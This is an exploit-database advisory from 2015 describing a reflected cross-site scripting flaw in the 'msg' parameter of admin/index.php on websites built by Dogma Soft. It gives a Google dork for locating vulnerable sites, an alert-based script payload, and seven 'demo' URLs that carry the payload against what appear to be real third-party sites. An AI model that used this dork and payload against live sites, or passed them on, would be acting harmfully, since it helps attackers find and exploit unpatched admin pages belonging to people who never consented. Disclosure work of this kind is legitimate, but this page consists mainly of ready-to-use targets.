Dogma Soft Cross Site Scripting

2015.08.19

Credit: Ehsan Hosseini

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: \"DESIGN BY:-Dogma Soft Pvt. Ltd.\"

###################################################
[+] Exploit Title: Dogma Soft Cross Site Scripting
[+] Exploit Author: Ehsan Hosseini
[+] Google Dork : "DESIGN BY:-Dogma Soft Pvt. Ltd."
[+] Date: 19/08/2015
[+] Platform: WebApps
[+] Vendor Homepage: http://dogmaindia.com/
[+] Tested on: Windows
[+] CVE : N/A
===============================
Cross Site Scripting :
site.com/admin/inde.php?msg=<script>alert(/xss/)</script>
===============================
Demos :
        http://kdpvtiXti.co.in/admin/index.php?msg=<script>alert(/xss/)</script>
        http://www.adarshiXtibhopal.com/admin/index.php?msg=<script>alert(/xss/)</script>
        http://www.bansuXriti.com/admin/index.php?msg=<script>alert(/xss/)</script>
        http://www.shailXendraitc.co.in/admin/index.php?msg=<script>alert(/xss/)</script>
        http://dhattarwXalpvtiti.com/admin/index.php?msg=<script>alert(/xss/)</script>
        http://runthlaiXti.com/admin/index.php?msg=<script>alert(/xss/)</script>
        http://www.jatiXniti.com/admin/index.php?msg=<script>alert(/xss/)</script>

Discovered By : Ehsan Hosseini

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Dogma Soft Cross Site Scripting

Dork: \"DESIGN BY:-Dogma Soft Pvt. Ltd.\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.